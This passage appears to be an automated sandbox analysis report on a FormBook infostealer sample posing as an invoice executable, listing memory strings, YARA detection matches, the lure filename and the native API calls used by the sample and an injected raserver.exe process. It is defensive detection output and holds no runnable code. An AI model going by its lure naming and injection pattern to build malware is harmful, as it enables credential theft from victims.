          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004182EB NtClose,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B2B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B2A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B2AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29560 NtWriteFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B2A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B2A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B29760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CFAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CFA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CFA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CFB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CFA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC82F0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC8270 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC81BC NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC82EB NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_6F731A98
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041D042
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041CB69
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00408C5B
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00408C60
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041CF4E
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB20A8
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFB090
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB28EC
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A830
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BBE824
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1002
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B04120
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEF900
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB22AE
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B9FA2B
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1EBB0
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B923E3
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA03DA
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BADBD2
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1ABD8
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB2B28
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0AB40
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B8CB4F
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF841F
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAD466
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12581
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFD5E0
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB25DD
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE0D20
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB2D07
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB1D55
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB2EF7
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B06E30
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAD616
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB1FF1
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BBDFCE
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_1_0041D042
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7D466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D825DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CCD5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE2581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D81D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D82D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CB0D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D82EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CD6E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D8DFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D81FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D828EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CCB090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE20A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D820A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71002
